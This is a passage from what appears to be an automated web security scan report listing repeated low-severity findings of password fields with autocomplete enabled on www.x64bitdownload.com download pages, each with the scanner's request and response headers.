<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.234. http://www.x64bitdownload.com/64-bit-multimedia-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multimedia-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-multimedia-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:45 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:19 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22multimedia%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92538


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.235. http://www.x64bitdownload.com/64-bit-multipart-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-multipart-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-multipart-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:35 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:39 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22multipart%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73514


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.236. http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-news-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:23 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:35 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.237. http://www.x64bitdownload.com/64-bit-news-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-news-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22news%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86979


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.238. http://www.x64bitdownload.com/64-bit-news-reader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-news-reader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-news-reader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:30 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:32 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A11%3A%22news-reader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A11%3A%22news+reader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 94415


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.239. http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsfeed-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-newsfeed-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:48:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:58:30 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22newsfeed%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37199


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.240. http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-newsgroup-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36453


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.241. http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroup-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-newsgroup-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:46:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:56:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22newsgroup%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76091


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.242. http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-newsgroups-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:33:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31386


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.243. http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsgroups-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-newsgroups-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsgroups%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88631


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.244. http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-newsreader-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:43 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32574


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.245. http://www.x64bitdownload.com/64-bit-newsreader-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-newsreader-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-newsreader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:35:14 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:45:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22newsreader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55916


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.246. http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-c-44-newsgroup-clients-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-nntp-c-44-newsgroup-clients-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:58 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A6%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A11%3A%22category_id%22%3Bs%3A2%3A%2244%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31814


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.247. http://www.x64bitdownload.com/64-bit-nntp-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nntp-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-nntp-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:13 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22nntp%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 87718


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.248. http://www.x64bitdownload.com/64-bit-nzb-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-nzb-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-nzb-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:51:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:01:48 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22nzb%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60656


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.249. http://www.x64bitdownload.com/64-bit-ozum-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-ozum-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-ozum-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:34:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:44:38 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22ozum%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29364


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.250. http://www.x64bitdownload.com/64-bit-par-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-par-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-par-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:54 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:18 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A3%3A%22par%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64738


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.251. http://www.x64bitdownload.com/64-bit-podcast-downloads.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-podcast-downloads.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /64-bit-podcast-downloads.html HTTP/1.1
